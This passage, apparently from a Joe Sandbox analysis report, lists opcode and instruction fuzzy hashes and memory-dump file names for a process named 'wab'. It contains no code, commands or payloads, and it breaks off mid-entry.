                                                                                                • API String ID:
                                                                                                • Opcode ID: f017209ca149c24bd586d8e01c8513762c32b3a20e0e7b1c1ca11c330181705d
                                                                                                • Instruction ID: 22e5ad0895b8115b0e9961037d730dda368b2f59ac531bc30c310a999b49efd2
                                                                                                • Opcode Fuzzy Hash: f017209ca149c24bd586d8e01c8513762c32b3a20e0e7b1c1ca11c330181705d
                                                                                                • Instruction Fuzzy Hash: F6415F34B04505CFC7686B5994A872DBB7EBB84B053388498E106877DACB35DC23CBA5
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000A.00000002.3337233111.0000000002300000.00000040.00000800.00020000.00000000.sdmp, Offset: 02300000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_10_2_2300000_wab.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 1b9e53140ae38cdbee169b3229ade479ff60ab594d6c6a8ba5027f661eecdec8
                                                                                                • Instruction ID: 8eaf27be5dfbdc9b6686e276fbb3302e5c11d631751c9eb2b8efb0e943d7aa07
                                                                                                • Opcode Fuzzy Hash: 1b9e53140ae38cdbee169b3229ade479ff60ab594d6c6a8ba5027f661eecdec8
                                                                                                • Instruction Fuzzy Hash: 9C41FEB1D00349DFDB10DFA9C990ADEBBB4FF48314F248029E909AB254DB75AA45CB91
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000A.00000002.3337233111.0000000002300000.00000040.00000800.00020000.00000000.sdmp, Offset: 02300000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_10_2_2300000_wab.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: b3590b81b3e554ad84ddf115b1d3dfc78422abd0787d0006302a9c44dd69f7e0
                                                                                                • Instruction ID: 71b794874994d1ad28df7b035b2104bfeca8709445f2f2fbc0fe0f6f87e4e094
                                                                                                • Opcode Fuzzy Hash: b3590b81b3e554ad84ddf115b1d3dfc78422abd0787d0006302a9c44dd69f7e0
                                                                                                • Instruction Fuzzy Hash: 08317D32B103419BCB15DBB4E8A05AE7B62EB893147108AADCD05DB349DF758D06C7E1
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000A.00000002.3337233111.0000000002300000.00000040.00000800.00020000.00000000.sdmp, Offset: 02300000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_10_2_2300000_wab.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 2a6daa5d6c8169e93d2e7f2a34a62740db8b17fc70d10306398a308f210a811d
                                                                                                • Instruction ID: 8e67b04f2139ed8ba6fd47fc315442dab0c228e995453a4aea55ccbd313c47af
                                                                                                • Opcode Fuzzy Hash: 2a6daa5d6c8169e93d2e7f2a34a62740db8b17fc70d10306398a308f210a811d
                                                                                                • Instruction Fuzzy Hash: 8941EEB0D00349DFDB10DFA9C990ADEBBF5BF48314F248029E909AB254DB75AA45CB91
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000A.00000002.3337233111.0000000002300000.00000040.00000800.00020000.00000000.sdmp, Offset: 02300000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_10_2_2300000_wab.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 81120fbdb5ec6fe3caf4ef10c8b6b7f1aaca8720ffb8b28f9689dafe56378bdf
                                                                                                • Instruction ID: 45f610556185113b152fd1fd7d78daceb0b69bf027d9efb5fd45e912c80b1502
                                                                                                • Opcode Fuzzy Hash: 81120fbdb5ec6fe3caf4ef10c8b6b7f1aaca8720ffb8b28f9689dafe56378bdf
                                                                                                • Instruction Fuzzy Hash: A8317275A00205CFDB18DF69D598BADBBF2BF48300F148569E501AB7A1CB75ED05CBA0
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000A.00000002.3337011035.00000000022CD000.00000040.00000800.00020000.00000000.sdmp, Offset: 022CD000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_10_2_22cd000_wab.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 131e1cd601f28a5289eecd12a72216890e7780d12969a2783ecc856a9eb57b1f
                                                                                                • Instruction ID: dc942d6e524f228419f729f91ffdf4b14d7cb5e86d9b0022be1eb9814c7efe95
                                                                                                • Opcode Fuzzy Hash: 131e1cd601f28a5289eecd12a72216890e7780d12969a2783ecc856a9eb57b1f
                                                                                                • Instruction Fuzzy Hash: 5B2136B1514201DFDB15DF54D9C0B26BF61FB84318F30827DD9090A25AC376D455CAA2
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000A.00000002.3337233111.0000000002300000.00000040.00000800.00020000.00000000.sdmp, Offset: 02300000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_10_2_2300000_wab.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 650973b8c2bfdfbd62518afb6647710c84c38c390425920f8cdeb1b26bc306e0
                                                                                                • Instruction ID: 1958733b380b6a06588d64fd0fe93607e53e2f10baf27b60926b770a80dac395
                                                                                                • Opcode Fuzzy Hash: 650973b8c2bfdfbd62518afb6647710c84c38c390425920f8cdeb1b26bc306e0
                                                                                                • Instruction Fuzzy Hash: C221E570A002448FCB55EF78D4E46AD7FB2EF85314B148AAED009DB282DB759907CF91
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000A.00000002.3337233111.0000000002300000.00000040.00000800.00020000.00000000.sdmp, Offset: 02300000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_10_2_2300000_wab.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 3ea97cb5ad371e9d78ad2ccb7183aca9c69c5739440598d30a50f970cb9bd645
                                                                                                • Instruction ID: bd4b9763df2413b3ee5dff793dbeb7e56c26c23e64097e5f1858386530674f8d
                                                                                                • Opcode Fuzzy Hash: 3ea97cb5ad371e9d78ad2ccb7183aca9c69c5739440598d30a50f970cb9bd645
                                                                                                • Instruction Fuzzy Hash: B3214F30F452428FDB9C5FB6A9A877E3BB4AB582017544829A846D61C1EFB4C960CB71
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000A.00000002.3337233111.0000000002300000.00000040.00000800.00020000.00000000.sdmp, Offset: 02300000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_10_2_2300000_wab.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: ac0eeaa1b117796bef06bb3791e4c1b75c983c2eda30c59bab3a573e14aa48ee
                                                                                                • Instruction ID: ef09fa836d75dc77e2bdac8aff3f4cf4ebb1964242b169d3d050367c07d5ee39
                                                                                                • Opcode Fuzzy Hash: ac0eeaa1b117796bef06bb3791e4c1b75c983c2eda30c59bab3a573e14aa48ee
                                                                                                • Instruction Fuzzy Hash: FD215030F522438FDB5C6FB6E9A873E3AB4AF48201B444829A847D21C0EFB4C950CB71
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000A.00000002.3337233111.0000000002300000.00000040.00000800.00020000.00000000.sdmp, Offset: 02300000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_10_2_2300000_wab.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 5aabf19159aa1bd4e99ce7d10c19080478ecba62b0a930d1e0a0d74ec4bece3d
                                                                                                • Instruction ID: 6c09408c8aad3fcb76315fbe27daff0e2f7a6de0f876e502616df4765f1f67e9
                                                                                                • Opcode Fuzzy Hash: 5aabf19159aa1bd4e99ce7d10c19080478ecba62b0a930d1e0a0d74ec4bece3d
                                                                                                • Instruction Fuzzy Hash: 95216B30600215CFDB14AB74C5A46AE77B2EB88704F144929D442AB3A1DF759C42DBA1
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000A.00000002.3337233111.0000000002300000.00000040.00000800.00020000.00000000.sdmp, Offset: 02300000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_10_2_2300000_wab.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: ef360f1ba2f9efe01ae7f72527d9ac6f6626499627e2806f8d2442b8703e60ee
                                                                                                • Instruction ID: b3d7ce0b86307b3c8660b30dc7a6703b7c596b848728312287543b0f52bcaf9f
                                                                                                • Opcode Fuzzy Hash: ef360f1ba2f9efe01ae7f72527d9ac6f6626499627e2806f8d2442b8703e60ee
                                                                                                • Instruction Fuzzy Hash: D6218E30B101148FDB149B78D868BAD77FAAF8CB10F24815AE502EB3E5CF719C018BA1
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000A.00000002.3337233111.0000000002300000.00000040.00000800.00020000.00000000.sdmp, Offset: 02300000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_10_2_2300000_wab.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: a04e6ec26ffb138f582b956c9d168296c69bb07854389f5eadc390e262b0d0f2
                                                                                                • Instruction ID: a6894d8de282c3e3022e25b0a1dc0c1cb6c7f601624e90dd55f964373db3aca0
                                                                                                • Opcode Fuzzy Hash: a04e6ec26ffb138f582b956c9d168296c69bb07854389f5eadc390e262b0d0f2
                                                                                                • Instruction Fuzzy Hash: 6521B770B50104CFDB149F69C4A9BADBBB6EF88B00F154459E902EB3E2CB719C41CB60
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000A.00000002.3337233111.0000000002300000.00000040.00000800.00020000.00000000.sdmp, Offset: 02300000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_10_2_2300000_wab.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 4c35797e0991766acf6eeba7a3befef5422d857b6a19214fb58631d269c93410
                                                                                                • Instruction ID: 1a649f5cdc9b2fd78a69181080eb318c12c4739f7609e254650711a247ebb239
                                                                                                • Opcode Fuzzy Hash: 4c35797e0991766acf6eeba7a3befef5422d857b6a19214fb58631d269c93410
                                                                                                • Instruction Fuzzy Hash: 9D114234B50104DFDB149F69C4A8B6DBBB6AF88B10F154459E502AB3E2CE71AC01CBA5
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000A.00000002.3337011035.00000000022CD000.00000040.00000800.00020000.00000000.sdmp, Offset: 022CD000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_10_2_22cd000_wab.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 19efff7c126650d5cb9b73f534a2037f7ec21590469f2fc0e01b49509d01f730
                                                                                                • Instruction ID: 969deab38c96988b43e6e728daa6a18c28358137835b468fd2ddfe09ca011084
                                                                                                • Opcode Fuzzy Hash: 19efff7c126650d5cb9b73f534a2037f7ec21590469f2fc0e01b49509d01f730
                                                                                                • Instruction Fuzzy Hash: C411B1B6504281CFCB16CF54D5C4B16BF61FB84328F34C6ADD9090B25AC33AD456CBA2
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000A.00000002.3337233111.0000000002300000.00000040.00000800.00020000.00000000.sdmp, Offset: 02300000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_10_2_2300000_wab.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: b2f658a4cf94a5a37d493a3d2c8d52833aa050e3004e3e49f272612143e0d0af
                                                                                                • Instruction ID: dbed5725f5c22bb23b6d57452378093e6a4a7586b491cbca508066949fb24bd5